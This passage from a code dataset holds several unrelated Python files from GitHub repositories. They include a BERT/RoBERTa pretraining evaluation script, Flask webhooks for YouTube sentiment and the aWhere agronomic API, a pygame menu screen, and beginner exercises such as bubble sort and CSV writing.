}\n \n\n@app.route(\"/youtube/search_by_ents\",methods = ['POST'])\ndef search_by_ents():\n data = json.loads(request.data)\n video_id = data['video_id']\n query = data['query']\n print(query)\n l = [query]\n obj = spy(video_id)\n k = obj.generate_df()\n m = obj.search_by_ents(l)\n print(m)\n return {\n \"search_by_ents\": m,\n }\n\n \n\n@app.route(\"/youtube/sentiment\",methods = ['POST'])\ndef get_sentiment():\n data = json.loads(request.data)\n video_id = data['video_id']\n\n obj = spy(video_id)\n obj.generate_df()\n k = obj.sentiment_analysis((-0.2, 0.2))\n d = {\n \"Negative\": k[\"Negative\"],\n \"Positive\": k[\"Positive\"],\n \"Neutral\": k[\"Neutral\"],\n \"label_stats\": dict(obj.show_label_stats()),\n }\n return d\n","repo_name":"Jash271/Deployment-test-repo","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34889860716","text":"def check(d,e):\n a=e[0]\n s1 = []\n for i in range(len(d)):\n for j in range(1,len(e)):\n y=e[j]\n if j==(len(e)-1) and a[i] == y[i]:\n s1.append(a[i])\n elif a[i] == y[i]:\n continue\n else:\n return s1\n return s1\nn=int(input())\ne=[]\nfor i in range(n):\n s1=input()\n e.append(s1)\nd=min(e)\nprint(\"\".join(check(d,e)))\n","repo_name":"monishramji/pyt","sub_path":"pro1.py","file_name":"pro1.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24391874965","text":"import os\nimport argparse\n\nfrom Pretraining.utils import *\nfrom Pretraining.model import RelationPT\nfrom Pretraining.model_rob import RelationPT_rob\nfrom Pretraining.data import DataLoader\nfrom transformers import (BertConfig, BertModel, BertTokenizer, BertPreTrainedModel)\nfrom Pretraining.lr_scheduler import get_linear_schedule_with_warmup\nfrom Pretraining.metric import *\n\nfrom transformers import (RobertaConfig, RobertaModel,AutoTokenizer, RobertaPreTrainedModel)\n\n#from Pretraining.eval import evaluate\nimport torch\nimport torch.nn as nn\nimport json\nfrom torch.utils.data import TensorDataset, SequentialSampler # DataLoader, RandomSampler, SequentialSampler\nfrom pathlib import Path\nfrom tqdm import tqdm\nimport pickle\nimport logging\n\nimport wandb\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)-8s %(message)s')\nlogFormatter = logging.Formatter('%(asctime)s %(levelname)-8s %(message)s')\nrootLogger = logging.getLogger()\n\ndef log_data(log):\n\n with open(\"./eval/results.json\", 'r') as f:\n dataset = json.load(f)\n\n dataset.append(log)\n with open(\"./eval/results.json\", 'w+') as f:\n json.dump(dataset, f)\n\ndef evaluate(args, concept_inputs, relation_inputs, entity_inputs, attribute_inputs, model, device, global_step=0,\n prefix='', **val_loaders):\n ## relation_eval_loader, concept_eval_loader, entity_eval_loader, attribute_eval_loader\n\n # eval_output_dir = args.output_dir\n # if not os.path.exists(eval_output_dir):\n # os.makedirs(eval_output_dir)\n print(global_step)\n checkpoint =global_step\n ############################ Eval!\n ## Operators!\n nb_eval_steps = 0\n func_metric = FunctionAcc(val_loaders['operator_val_loader'].vocab['function2id'][''])\n pbar = ProgressBar(n_total=len(val_loaders['operator_val_loader']), desc=\"Evaluating\")\n correct = 0\n tot = 0\n val_loss = 0\n function_loss = 0\n for step, batch in enumerate(val_loaders['operator_val_loader']):\n model.eval()\n batch = tuple(t.to(device) for t in batch)\n # print(batch[4].size())\n with torch.no_grad():\n batch = tuple(t.to(device) for t in batch)\n inputs = {\n # 'concept_inputs': concept_inputs,\n # 'relation_inputs': relation_inputs,\n # 'entity_inputs': entity_inputs,\n # 'attribute_inputs': attribute_inputs,\n 'input_ids': batch[0],\n 'token_type_ids': batch[1],\n 'attention_mask': batch[2],\n 'function_ids': batch[3],\n # 'attribute_info': (batch[4], None),\n # 'relation_info': (batch[4], None),\n 'concept_info': None,\n 'entity_info': None,\n # 'entity_embeddings': None\n 'operator_info': (batch[4], None)\n }\n outputs = model(**inputs)\n pred_functions = outputs['pred_functions'].cpu().tolist()\n pred_relation = outputs['pred_operator']\n gt_relation = batch[5]\n gt_relation = gt_relation.squeeze(-1)\n val_loss += float(nn.CrossEntropyLoss()(outputs['operator_logits'], gt_relation).item())\n function_loss += float(outputs['function_loss'].item())\n # print(pred_relation.size(), gt_relation.size(), batch[3].size())\n correct += torch.sum(torch.eq(pred_relation, gt_relation).float())\n # print(correct)\n tot += len(pred_relation)\n gt_functions = batch[3].cpu().tolist()\n for pred, gt in zip(pred_functions, gt_functions):\n func_metric.update(pred, gt)\n nb_eval_steps += 1\n pbar(step)\n logging.info('')\n acc = func_metric.result()\n logging.info('**** function results %s ****', prefix)\n info = 'acc: {}'.format(acc)\n logging.info(info)\n acc = correct.item() / tot\n log = {'checkpoint':checkpoint, 'acc_operations': acc, \"op_val_loss\": val_loss, 'step': global_step}\n log_data(log)\n if args.wandb:\n wandb.log(log)\n logging.info('**** operation results %s ****', prefix)\n logging.info('acc: {}'.format(acc))\n\n # Eval!\n ## Attributes!\n nb_eval_steps = 0\n func_metric = FunctionAcc(val_loaders['attribute_val_loader'].vocab['function2id'][''])\n pbar = ProgressBar(n_total=len(val_loaders['attribute_val_loader']), desc=\"Evaluating\")\n correct = 0\n tot = 0\n val_loss = 0\n function_loss = 0\n for step, batch in enumerate(val_loaders['attribute_val_loader']):\n model.eval()\n batch = tuple(t.to(device) for t in batch)\n # print(batch[4].size())\n with torch.no_grad():\n batch = tuple(t.to(device) for t in batch)\n inputs = {\n # 'concept_inputs': concept_inputs,\n # 'relation_inputs': relation_inputs,\n # 'entity_inputs': entity_inputs,\n 'attribute_inputs': attribute_inputs,\n 'input_ids': batch[0],\n 'token_type_ids': batch[1],\n 'attention_mask': batch[2],\n 'function_ids': batch[3],\n 'attribute_info': (batch[4], None),\n # 'relation_info': (batch[4], None),\n 'concept_info': None,\n 'entity_info': None,\n # 'entity_embeddings': None\n }\n outputs = model(**inputs)\n pred_functions = outputs['pred_functions'].cpu().tolist()\n pred_relation = outputs['pred_attribute']\n gt_relation = batch[5]\n gt_relation = gt_relation.squeeze(-1)\n val_loss += float(nn.CrossEntropyLoss()(outputs['attribute_logits'], gt_relation).item())\n function_loss += float(outputs['function_loss'].item())\n # print(pred_relation.size(), gt_relation.size(), batch[3].size())\n correct += torch.sum(torch.eq(pred_relation, gt_relation).float())\n # print(correct)\n\n\n\n tot += len(pred_relation)\n gt_functions = batch[3].cpu().tolist()\n for pred, gt in zip(pred_functions, gt_functions):\n func_metric.update(pred, gt)\n nb_eval_steps += 1\n pbar(step)\n logging.info('')\n acc = func_metric.result()\n logging.info('**** function results %s ****', prefix)\n info = 'acc: {}'.format(acc)\n logging.info(info)\n acc = correct.item() / tot\n log = {'checkpoint': checkpoint, 'function_loss': function_loss/(step+1), 'acc_func': func_metric.result(), 'acc_attributes': acc, \"att_val_loss\": val_loss, 'step': global_step}\n log_data(log)\n if args.wandb:\n wandb.log(log)\n logging.info('**** attribute results %s ****', prefix)\n logging.info('acc: {}'.format(acc))\n\n ## Relations!\n nb_eval_steps = 0\n func_metric = FunctionAcc(val_loaders['relation_val_loader'].vocab['function2id'][''])\n pbar = ProgressBar(n_total=len(val_loaders['relation_val_loader']), desc=\"Evaluating\")\n correct = 0\n tot = 0\n val_loss = 0\n function_loss = 0\n for step, batch in enumerate(val_loaders['relation_val_loader']):\n model.eval()\n batch = tuple(t.to(device) for t in batch)\n # print(batch[4].size())\n with torch.no_grad():\n batch = tuple(t.to(device) for t in batch)\n inputs = {\n 'concept_inputs': concept_inputs,\n 'relation_inputs': relation_inputs,\n 'entity_inputs': entity_inputs,\n 'input_ids': batch[0],\n 'token_type_ids': batch[1],\n 'attention_mask': batch[2],\n 'function_ids': batch[3],\n 'relation_info': (batch[4], None),\n 'concept_info': None,\n 'entity_info': None,\n # 'entity_embeddings': None\n }\n outputs = model(**inputs)\n pred_functions = outputs['pred_functions'].cpu().tolist()\n pred_relation = outputs['pred_relation']\n gt_relation = batch[5]\n gt_relation = gt_relation.squeeze(-1)\n val_loss += float(nn.CrossEntropyLoss()(outputs['relation_logits'], gt_relation).item())\n # print(pred_relation.size(), gt_relation.size(), batch[3].size())\n correct += torch.sum(torch.eq(pred_relation, gt_relation).float())\n function_loss += float(outputs['function_loss'].item())\n # print(correct)\n tot += len(pred_relation)\n gt_functions = batch[3].cpu().tolist()\n for pred, gt in zip(pred_functions, gt_functions):\n func_metric.update(pred, gt)\n nb_eval_steps += 1\n pbar(step)\n logging.info('')\n acc = func_metric.result()\n logging.info('**** function results %s ****', prefix)\n info = 'acc: {}'.format(acc)\n logging.info(info)\n acc = correct.item() / tot\n log = {'checkpoint':checkpoint,'function_loss': function_loss/(step+1), 'acc_func': func_metric.result(), 'acc_relations': acc, \"rel_val_loss\": val_loss, 'step': global_step}\n log_data(log)\n if args.wandb:\n wandb.log(log)\n logging.info('**** relation results %s ****', prefix)\n logging.info('acc: {}'.format(acc))\n\n ## Concepts!\n nb_eval_steps = 0\n func_metric = FunctionAcc(val_loaders['concept_val_loader'].vocab['function2id'][''])\n pbar = ProgressBar(n_total=len(val_loaders['concept_val_loader']), desc=\"Evaluating\")\n correct = 0\n tot = 0\n val_loss = 0\n function_loss = 0\n for step, batch in enumerate(val_loaders['concept_val_loader']):\n model.eval()\n batch = tuple(t.to(device) for t in batch)\n # print(batch[4].size())\n with torch.no_grad():\n batch = tuple(t.to(device) for t in batch)\n inputs = {\n 'concept_inputs': concept_inputs,\n 'relation_inputs': relation_inputs,\n 'entity_inputs': entity_inputs,\n 'input_ids': batch[0],\n 'token_type_ids': batch[1],\n 'attention_mask': batch[2],\n 'function_ids': batch[3],\n 'relation_info': None,\n 'concept_info': (batch[4], None),\n 'entity_info': None,\n # 'entity_embeddings': None\n }\n outputs = model(**inputs)\n pred_functions = outputs['pred_functions'].cpu().tolist()\n pred_relation = outputs['pred_concept']\n gt_relation = batch[5]\n gt_relation = gt_relation.squeeze(-1)\n val_loss += float(nn.CrossEntropyLoss()(outputs['concept_logits'], gt_relation).item())\n function_loss += float(outputs['function_loss'].item())\n # print(pred_relation.size(), gt_relation.size(), batch[3].size())\n correct += torch.sum(torch.eq(pred_relation, gt_relation).float())\n # print(correct)\n tot += len(pred_relation)\n gt_functions = batch[3].cpu().tolist()\n for pred, gt in zip(pred_functions, gt_functions):\n func_metric.update(pred, gt)\n nb_eval_steps += 1\n pbar(step)\n logging.info('')\n acc = func_metric.result()\n logging.info('**** function results %s ****', prefix)\n info = 'acc: {}'.format(acc)\n logging.info(info)\n acc = correct.item() / tot\n logging.info('**** concept results %s ****', prefix)\n logging.info('acc: {}'.format(acc))\n log = {'checkpoint':checkpoint, 'function_loss': function_loss/(step+1), 'acc_func': func_metric.result(), 'acc_concepts': acc, \"cons_val_loss\": val_loss, 'step': global_step}\n log_data(log)\n if args.wandb:\n wandb.log(log)\n\n # Entities!\n # with torch.no_grad():\n # model.entity_embeddings = model.bert(input_ids=entity_inputs['input_ids'],\n # attention_mask=entity_inputs['attention_mask'],\n # token_type_ids=entity_inputs['token_type_ids'])[1]\n\n # with open(os.path.abspath(args.input_dir + \"/entity/entity_embeddings_3110.pt\"), 'rb') as f:\n\n # model.entity_embeddings = pickle.load(f)\n # with open('c_embeddings.pt', 'wb') as f: #os.path.join(args.output_dir,\n # # for o in concept_embeddings:\n # # print(o)\n # pickle.dump(concept_embeddings, f)\n\n nb_eval_steps = 0\n func_metric = FunctionAcc(val_loaders['entity_val_loader'].vocab['function2id'][''])\n pbar = ProgressBar(n_total=len(val_loaders['entity_val_loader']), desc=\"Evaluating\")\n correct = 0\n tot = 0\n val_loss = 0\n results = []\n function_loss = 0\n\n for step, batch in enumerate(val_loaders['entity_val_loader']):\n model.eval()\n batch = tuple(t.to(device) for t in batch)\n # print(batch[4].size())\n\n with torch.no_grad():\n batch = tuple(t.to(device) for t in batch)\n inputs = {\n 'concept_inputs': concept_inputs,\n 'relation_inputs': relation_inputs,\n 'entity_inputs': entity_inputs,\n 'input_ids': batch[0],\n 'token_type_ids': batch[1],\n 'attention_mask': batch[2],\n 'function_ids': batch[3],\n 'relation_info': None,\n 'concept_info': None,\n 'entity_info': (batch[4], None),\n # 'entity_embeddings':entity_embeddings\n }\n outputs = model(**inputs)\n pred_functions = outputs['pred_functions'].cpu().tolist()\n pred_relation = outputs['pred_entity']\n gt_relation = batch[5]\n gt_relation = gt_relation.squeeze(-1)\n val_loss += float(nn.CrossEntropyLoss()(outputs['entity_logits'], gt_relation).item())\n # print(pred_relation.size(), gt_relation.size(), batch[3].size())\n function_loss += float(outputs['function_loss'].item())\n correct += torch.sum(torch.eq(pred_relation, gt_relation).float())\n # print(correct)\n tot += len(pred_relation)\n gt_functions = batch[3].cpu().tolist()\n for pred, gt in zip(pred_functions, gt_functions):\n func_metric.update(pred, gt)\n end_id = val_loaders['entity_val_loader'].vocab['function2id']['']\n boolean = []\n for pred, label in zip(pred_functions, gt_functions):\n for i in range(min(len(pred), len(label))):\n if label[i] != pred[i]:\n match = False\n boolean.append(True)\n break\n if pred[i] == end_id and label[i] == end_id:\n boolean.append(False)\n break\n if args.model_type == 'roberta':\n tokenizer = AutoTokenizer.from_pretrained('roberta-base', do_lower_case=False)\n else:\n tokenizer = AutoTokenizer.from_pretrained('bert-base-cased', do_lower_case=False)\n sents = tokenizer.batch_decode(inputs['input_ids'].to('cpu'))\n\n for des, val, pred, label in zip(boolean, sents, pred_functions, gt_functions):\n results.append({'question': val, 'prediction': pred, 'functions': label, 'label': des})\n nb_eval_steps += 1\n pbar(step)\n logging.info('')\n acc = func_metric.result()\n logging.info('**** function results %s ****', prefix)\n info = 'acc: {}'.format(acc)\n logging.info(info)\n acc = correct.item() / tot\n logging.info('**** entity results %s ****', prefix)\n logging.info('acc: {}'.format(acc))\n log = {'checkpoint':checkpoint, 'function_loss': function_loss/(step+1), 'acc_func': func_metric.result(), 'acc_entities': acc, \"ent_val_loss\": val_loss, 'step': global_step}\n print(results[0:3])\n with open(f'./eval/function_predictions_{checkpoint}.json', 'w') as fp:\n json.dump(results, fp)\n log_data(log)\n\n if args.wandb:\n wandb.log(log)\n\n\n\n\ndef embed_ents(model,args):\n batch_num = 128\n # argument_inputs = load_classes(input_dir + \"esa/new/entity_3110.pt\", )\n argument_inputs = load_classes(args.data_dir + \"/entity/entity.pt\",'cpu')\n data = TensorDataset(argument_inputs['input_ids'], argument_inputs['attention_mask'],\n argument_inputs['token_type_ids'])\n data_sampler = SequentialSampler(data)\n dataloader = torch.utils.data.DataLoader(data, sampler=data_sampler, batch_size=batch_num)\n\n attribute_embeddings = []\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n with torch.no_grad():\n for i, batch in enumerate(tqdm(dataloader)):\n # if i == 1:\n # break\n inputs = batch[0].to(device)\n masks = batch[1].to(device)\n tags = batch[2].to(device)\n\n attribute_embeddings += model.bert(input_ids=inputs,\n attention_mask=masks,\n token_type_ids=tags)[1].cpu()\n attribute_embeddings = torch.stack(attribute_embeddings)\n\n model.entity_embeddings = attribute_embeddings.cuda()\n\ndef load_classes(path,device):\n with open(os.path.abspath(path), 'rb') as f:\n input_ids = pickle.load(f)\n token_type_ids = pickle.load(f)\n attention_mask = pickle.load(f)\n # input_ids = torch.LongTensor(input_ids[:512,:]).to(device)\n # token_type_ids = torch.LongTensor(token_type_ids[:512,:]).to(device)\n # attention_mask = torch.LongTensor(attention_mask[:512,:]).to(device)\n input_ids = torch.LongTensor(input_ids).to(device)\n token_type_ids = torch.LongTensor(token_type_ids).to(device)\n attention_mask = torch.LongTensor(attention_mask).to(device)\n argument_inputs = {\n 'input_ids': input_ids,\n 'token_type_ids': token_type_ids,\n 'attention_mask': attention_mask\n }\n return argument_inputs\n\ndef main():\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--models_dir', type=str, default='./train/')\n parser.add_argument('--data_dir', type=str, default='./test_data/')\n parser.add_argument('--val_batch_size', type=int, default=128)\n parser.add_argument('--wandb', type=int, default=1)\n parser.add_argument('--model_type', type=str, default=\"bert\")\n #parser.add_argument('--save_dir', type=int, default=128)\n\n args = parser.parse_args()\n vocab_json = os.path.join(args.data_dir, 'vocab.json')\n operator_val_pt = os.path.join(args.data_dir, 'operator', 'dev.pt')\n concept_val_pt = os.path.join(args.data_dir, 'concept', 'dev.pt')\n entity_val_pt = os.path.join(args.data_dir, 'entity', 'dev.pt')\n relation_val_pt = os.path.join(args.data_dir, 'relation', 'dev.pt')\n attribute_val_pt = os.path.join(args.data_dir, 'attribute', 'dev.pt')\n\n concept_val_loader = DataLoader(vocab_json, concept_val_pt, args.val_batch_size)\n relation_val_loader = DataLoader(vocab_json, relation_val_pt, args.val_batch_size)\n entity_val_loader = DataLoader(vocab_json, entity_val_pt, args.val_batch_size)\n attribute_val_loader = DataLoader(vocab_json, attribute_val_pt, args.val_batch_size)\n operator_val_loader = DataLoader(vocab_json, operator_val_pt, args.val_batch_size)\n\n val_loaders = {'entity_val_loader': entity_val_loader,\n 'concept_val_loader': concept_val_loader,\n 'attribute_val_loader': attribute_val_loader,\n 'operator_val_loader': operator_val_loader,\n 'relation_val_loader': relation_val_loader,\n }\n models_path = Path(args.models_dir)\n\n if args.wandb:\n wandb.init(project=\"ProgramTransfer_Augmentation1001\", name=args.models_dir)\n\n for model_dir in models_path.iterdir():\n if not model_dir.is_dir():\n continue\n\n if args.model_type == 'bert':\n\n config_class, model_class = (BertConfig, RelationPT)\n\n else:\n\n config_class, model_class = (RobertaConfig, RelationPT_rob)\n\n print(\"load ckpt from {}\".format(model_dir))\n config = config_class.from_pretrained(model_dir) # , num_labels = len(label_list))\n model = model_class.from_pretrained(model_dir, config=config)\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n if torch.cuda.is_available(): #\n model.cuda()\n\n embed_ents(model,args)\n\n attribute_inputs = load_classes(args.data_dir + \"attribute/attribute.pt\", device)\n # with torch.no_grad():\n # attribute_embeddings = model.bert(input_ids=argument_inputs['input_ids'],\n # attention_mask=argument_inputs['attention_mask'],\n # token_type_ids=argument_inputs['token_type_ids'])[1]\n\n concept_inputs = load_classes(args.data_dir + \"concept/concept.pt\", device)\n # with torch.no_grad():\n # concept_embeddings = model.bert(input_ids=argument_inputs['input_ids'],\n # attention_mask=argument_inputs['attention_mask'],\n # token_type_ids=argument_inputs['token_type_ids'])[1]\n\n ##argument_inputs = load_classes(input_dir + \"relation/relation.pt\", device)\n # with torch.no_grad():\n # relation_embeddings = _model.bert(input_ids=argument_inputs['input_ids'],\n # attention_mask=argument_inputs['attention_mask'],\n # token_type_ids=argument_inputs['token_type_ids'])[1]\n\n relation_inputs = load_classes(args.data_dir + \"relation/relation.pt\", device)\n # with torch.no_grad():\n # relation_embeddings = model.bert(input_ids=argument_inputs['input_ids'],\n # attention_mask=argument_inputs['attention_mask'],\n # token_type_ids=argument_inputs['token_type_ids'])[1]\n\n #checkpoint = str(model_dir).split('\\\\')[-1]\n checkpoint = str(model_dir).split(\"checkpoint-\")[1]\n entity_inputs = []\n evaluate(args, concept_inputs, relation_inputs, entity_inputs, attribute_inputs, model,device, global_step=int(checkpoint), **val_loaders)\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n\n\n","repo_name":"PaulDrm/DISCOSQA","sub_path":"app/Pretraining/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":22352,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"9224433619","text":"import pygame, sys, math\nimport serial\nimport threading\n\nfrom config import *\nfrom util import *\nfrom status import *\n\ndef homePage():\n\tgameDisplay = pygame.display.set_mode((Config.display_width, Config.display_height))\n\tclock = pygame.time.Clock()\n\n\tintro = True\n\n\twhile intro:\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tpygame.quit()\n\t\t\t\tStatus.isQuit = True\n\t\t\t\tintro = False\n\t\t\t\tsys.exit()\n\n\t\tmouse = pygame.mouse.get_pos()\n\t\tclick = pygame.mouse.get_pressed()\n\n\t\tgameDisplay.fill(Config.white)\n\n\t\t#drawImage(gameDisplay, \"media/background.jpg\", Config.display_width//2, Config.display_height//2, (Config.display_width,Config.display_height))\n\t\tdrawImage(gameDisplay, \"media/pianoop.png\", Config.display_width//2, Config.display_height//2+50, (200,200))\n\t\tdrawText(gameDisplay, \"P I A N E E R\", Config.display_width//2, Config.display_height//2 + 180, \"Courier New\", 30, Config.black)\n\n\t\tif math.sqrt((mouse[0]-980)**2+(mouse[1]-50)**2) <= 15:\n\t\t\tpygame.draw.circle(gameDisplay, Config.grey, (980,50), 15)\n\t\t\tpygame.draw.line(gameDisplay, Config.black, (970,40), (988,60), 2)\n\t\t\tpygame.draw.line(gameDisplay, Config.black, (988,40), (970,60), 2)\n\t\t\tif click[0] == 1:\n\t\t\t\tpygame.quit()\n\t\t\t\tStatus.isQuit = True\n\t\t\t\tintro = False\n\t\t\t\tsys.exit()\n\t\telse:\n\t\t\tpygame.draw.circle(gameDisplay, Config.darkGrey, (980,50), 15)\n\t\t\tpygame.draw.line(gameDisplay, Config.black, (970,40), (988,60), 2)\n\t\t\tpygame.draw.line(gameDisplay, Config.black, (988,40), (970,60), 2)\n\n\t\t\n\t\tpygame.display.update()\n\t\tclock.tick(60)\n\n\ndef runHomepage():\n\tpygame.init()\n\thomePage()\n\n\nif __name__ == '__main__':\n\trunHomepage()","repo_name":"rickzx/PortablePiano","sub_path":"Software/homepage.py","file_name":"homepage.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74777460965","text":"import csv\n\npeople = [\n {'name': 'Maria', 'age': 25, 'job': 'Scientist'},\n {'name': 'Wes', 'age': 8, 'job': 'Programmer'},\n {'name': 'Greg', 'age': 48, 'job': 'Big boss'},\n ]\n\nwith open('people.csv', 'w', encoding='utf8', newline='') as f:\n fields = ['name', 'age', 'job']\n writer = csv.DictWriter(f, fields, delimiter=';')\n writer.writeheader()\n for user in people:\n writer.writerow(user)\n","repo_name":"AlexGlau/pythonCourse","sub_path":"files/csv_file.py","file_name":"csv_file.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12297901190","text":"#Python Program to Sort an array of elements using Bubble sort technique\n\nprint(\"\\nProgram To Sort an Array of Elements using Bubble Sort technique...\")\n\nsize = input(\"\\n Enter the size of array to store the elements you type:\")\n\narr = list()\nprint (\"\\n Enter the elements of the array now :\")\n\nfor i in range(int(size)):\n n = input(\"Enter the Element :\")\n arr.append(int(n))\n\nprint(\"\\n Sorting Begins now\")\nfor i in range(size):\n\tfor j in range(0, size-i-1):\n\t if arr[j] > arr[j+1] :\n arr[j], arr[j+1] = arr[j+1], arr[j]\n\nfor i in range(size):\n\tprint(\"\\n\")\n\tprint(\"%d\" %arr[i])\n","repo_name":"vvr3ddy/Python_basics","sub_path":"BubbleSort.py","file_name":"BubbleSort.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42617197845","text":"import requests\nendpoint = \"http://localhost:8000/api/products/\"\n\nheaders = {'Authorization': 'Bearer 9dcd3b7044b1b47b057bb0f9f00fa8abd1ec2e05'}\n\ndata = {\n \"title\": \"This field is done\",\n \"price\": \"32.49\"\n}\n\nget_response = requests.post( endpoint, json = data, headers = headers )\nprint(get_response.json()) # returns json","repo_name":"burhanuddinbaig/Django-Rest-Framework-Course","sub_path":"pyClient/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"43751659613","text":"\"\"\"Logger module\"\"\"\nimport logging\nfrom typing import List, Union\nfrom pathlib import Path\n\nbasehandler = logging.StreamHandler()\nformatter = logging.Formatter(fmt=\" %(name)s :: %(levelname)-8s :: %(message)s\")\nbasehandler.setFormatter(formatter)\n\n\nclass LoggerBase:\n def __init__(self, **kwargs) -> None:\n self.init_logging()\n\n def init_logging(self) -> None:\n self.logger: logging.Logger = logging.getLogger(self.__class__.__name__)\n self.logger.addHandler(basehandler)\n self._logging_filehandler: Union[None, logging.FileHandler] = None\n\n def set_log_filehandler(self, filepath: Path) -> None:\n fh = logging.FileHandler(str(filepath), \"a\")\n fh.setFormatter(formatter)\n self._logging_filehandler = fh\n self.logger.addHandler(fh)\n\n def __del__(self) -> None:\n self.close_logger()\n\n def close_logger(self) -> None:\n handlers: List[logging.Handler] = self.logger.handlers\n for handler in handlers:\n handler.close()\n self.logger.removeHandler(handler)\n","repo_name":"Reidmen/LostTraderBot","sub_path":"losttraderbot/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"17958002820","text":"\"\"\"ML Dataset Container\"\"\"\nfrom typing import Optional\nimport os\nimport json\n\nclass MLdatasets:\n \"\"\"ML Dataset Container Class\"\"\"\n dsconfig_path:str = None\n kaggle_enabled:bool = None\n kaggle_json_path:str = None\n kaggle_username:str = None\n kaggle_key:str = None\n\n def __init__(\n self,\n dsconfig_path:Optional[str] = './dsconfig.json',\n kaggle_enabled:Optional[bool] = None,\n kaggle_json_path:Optional[str] = None,\n kaggle_username:Optional[str] = None,\n kaggle_key:Optional[str] = None\n ) -> None:\n\n self.dsconfig_path = dsconfig_path\n self.kaggle_enabled = False\n\n if (kaggle_enabled is None) or (kaggle_enabled is True):\n if kaggle_json_path is not None:\n self.kaggle_json_path = kaggle_json_path\n with open('./kaggle.json', encoding=\"utf-8\") as file:\n kaggle_creds = json.load(file)\n kaggle_username = kaggle_creds['username']\n kaggle_key = kaggle_creds['key']\n if kaggle_username is not None:\n self.kaggle_username = kaggle_username\n if kaggle_key is not None:\n self.kaggle_key = kaggle_key\n if self.kaggle_username is not None and self.kaggle_key is not None:\n os.environ['KAGGLE_USERNAME'] = self.kaggle_username\n os.environ['KAGGLE_KEY'] = self.kaggle_key\n if 'KAGGLE_USERNAME' in os.environ and 'KAGGLE_KEY' in os.environ:\n self.kaggle_enabled = True\n #test_cmd = 'kaggle datasets list --sort-by votes'\n #runcmd(test_cmd)\n #os.environ['KAGGLE_USERNAME'] = self.kaggle_username\n #os.environ['KAGGLE_KEY'] = self.kaggle_key\n return None\n","repo_name":"smasis001/Machine-Learning-Datasets","sub_path":"machine_learning_datasets/container.py","file_name":"container.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9129570773","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nfrom __future__ import division\nfrom __future__ import absolute_import\nfrom future import standard_library\nfrom future import standard_library\nstandard_library.install_aliases()\n\nfrom urllib.parse import urlparse, urlencode\nfrom urllib.request import urlopen, Request\nfrom urllib.error import HTTPError\n\nfrom builtins import str\nfrom builtins import bytes\nfrom builtins import object\n\nimport requests as rq\nimport base64\nimport pprint\nimport json\nimport os\nimport random\nimport sys\nimport datetime\nfrom datetime import date\n\nfrom flask import Flask\nfrom flask import request\nfrom flask import make_response\nfrom flask import render_template\n\n\n# Flask app should start in global layout\n\napp = Flask(__name__)\n\t\n@app.route('/hello')\ndef hello():\n return render_template('index.html')\n\n@app.route('/webhook', methods=['POST'])\ndef webhook():\n req = request.get_json(silent=True, force=True)\n\n res = processRequest(req)\n res = json.dumps(res, indent=4)\n print(res)\n sys.stdout.flush()\n\n r = make_response(res)\n r.headers['Content-Type'] = 'application/json'\n return r\n\ndef processRequest(req):\n # Parsing the POST request body into a dictionary for easy access. \n req_dict = json.loads(request.data)\n \n parameters = req_dict[\"result\"][\"parameters\"]\n \n parameterDate = parameters[\"date\"][5:10]\n parameterCrop = parameters[\"crop\"]\n\n # checking for faults in parameters\n startDt = date(2018, 5, 1)\n endDt = date(2018, int(parameterDate[0:2]), int(parameterDate[3:5]))\n if startDt>endDt:\n speech = 'Growing season did not start yet!'\n elif not (parameterCrop == 'cotton' or parameterCrop == 'corn'):\n speech = 'Crop not supported yet!'\n\n # constructing the resposne string.\n else:\n speech = integrate(parameterDate, parameterCrop)\n res = makeWebhookResult(speech)\n return res\n\ndef makeWebhookResult(speech):\n print(\"Response:\")\n sys.stdout.flush()\n print(speech)\n sys.stdout.flush()\n\n return {\n \"speech\": speech,\n \"displayText\": speech,\n \"source\": \"Build conversational interface for your app in 10 minutes.\"\n }\n\n#FUNCTION TO CALL AWHERE\ndef integrate(date, crop):\n awhere = AWhereAPI(date, crop)\n return awhere.get_agronomic_url_today()\n\n#AWHERE\nclass AWhereAPI(object):\n def __init__(self, end_dt, crop):\n \"\"\"\n Initializes the AWhereAPI class, which is used to perform HTTP requests \n to the aWhere V2 API.\n elf. Docs:\n http://developer.awhere.com/api/reference\n \"\"\"\n \n self.THIS_DT = datetime.datetime.today().strftime('%m-%d')\n self.END_DT = end_dt\n self.START_DT = '05-01'\n self.START_YEAR = '2015'\n self.END_YEAR = '2018'\n self.THIS_YEAR = '2019'\n self.CROP = crop\n if self.CROP == 'cotton':\n self.FIELD = 'field4'\n elif self.CROP == 'corn':\n self.FIELD = 'field1'\n self.NUM_OF_DAYS = self.number_of_days()\n self._fields_url = 'https://api.awhere.com/v2/fields'\n self._weather_url = 'https://api.awhere.com/v2/weather/fields'\n self._agronomic_url = 